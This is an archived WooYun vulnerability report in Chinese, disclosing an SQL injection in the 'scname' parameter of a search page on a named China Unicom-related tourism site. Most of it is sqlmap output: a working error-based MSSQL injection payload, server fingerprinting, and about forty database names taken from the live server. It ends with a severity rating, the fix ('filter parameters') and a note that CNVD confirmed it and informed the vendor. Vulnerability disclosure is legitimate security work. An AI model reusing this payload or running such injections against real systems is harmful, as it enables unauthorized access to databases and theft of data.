乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-28: 细节已通知厂商并且等待厂商处理中 2014-08-01: 厂商已经确认,细节仅向厂商公开 2014-08-11: 细节向核心白帽子及相关领域专家公开 2014-08-21: 细节向普通白帽子公开 2014-08-31: 细节向实习白帽子公开 2014-09-11: 细节向公众公开
手感真好~一点一个洞
注入点:http://jingdian.wo116114.com/search.aspx?scname=1
---Place: GETParameter: scname Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: scname=' AND 3313=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (3313=3313) THEN CHAR(49) ELSE CHAR(48)END))+CHAR(113)+CHAR(116)+CHAR(107)+CHAR(111)+CHAR(113))) AND 'uYKv'='uYKv---[22:23:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128back-end DBMS: Microsoft SQL Server 2005[22:23:17] [INFO] fetching database names[22:23:17] [INFO] the SQL query used returns 42 entries[22:23:19] [INFO] retrieved: ScenicManager_DB[22:23:19] [INFO] retrieved: master[22:23:19] [INFO] retrieved: tempdb[22:23:19] [INFO] retrieved: model[22:23:22] [INFO] retrieved: msdb[22:23:22] [INFO] retrieved: Advertising_DB[22:23:22] [INFO] retrieved: AudioManagerProduct_DB[22:23:22] [INFO] retrieved: AudioManagerProduct_DBnew[22:23:22] [INFO] retrieved: AudioManagerSales_DB[22:23:22] [INFO] retrieved: B2C_DB[22:23:22] [INFO] retrieved: CMS_DB[22:23:22] [INFO] retrieved: CMS_OuterDB[22:23:22] [INFO] retrieved: CRM_DB[22:23:22] [INFO] retrieved: FeatureDB[22:23:22] [INFO] retrieved: GAS_DB[22:23:22] [INFO] retrieved: GASOUTER_DB[22:23:22] [INFO] retrieved: IVR_DB[22:23:22] [INFO] retrieved: LBS_DB[22:23:22] [INFO] retrieved: LBS_Original_DB[22:23:23] [INFO] retrieved: LOG_DB[22:23:23] [INFO] retrieved: MPSignIn_DB[22:23:23] [INFO] retrieved: NPASALES_DB[22:23:23] [INFO] retrieved: NPASALES_TEST_DB[22:23:23] [INFO] retrieved: ReportServer[22:23:23] [INFO] retrieved: ReportServerTempDB[22:23:23] [INFO] retrieved: ScenesBackDB[22:23:23] [INFO] retrieved: SCENESCUSTOMERREV_DB[22:23:23] [INFO] retrieved: ScenicMedia_DB[22:23:23] [INFO] retrieved: SCENICSPOT_DB[22:23:23] [INFO] retrieved: URM_DB[22:23:23] [INFO] retrieved: Vote[22:23:23] [INFO] retrieved: WEBSTATS_DB[22:23:23] [INFO] retrieved: AudioManagerProduct_DB_pubnew[22:23:23] [INFO] retrieved: LBS_Original_DB_pubnew[22:23:23] [INFO] retrieved: SCENICSPOT_DB_pubnew[22:23:23] [INFO] retrieved: Culture[22:23:23] [INFO] retrieved: B2B_Wine[22:23:23] [INFO] retrieved: AllCityCode
过滤参数
危害等级:高
漏洞Rank:11
确认时间:2014-08-01 21:07
CNVD确认并复现所述情况,已经转由CNCERT直接通报中国联通集团公司处置。
暂无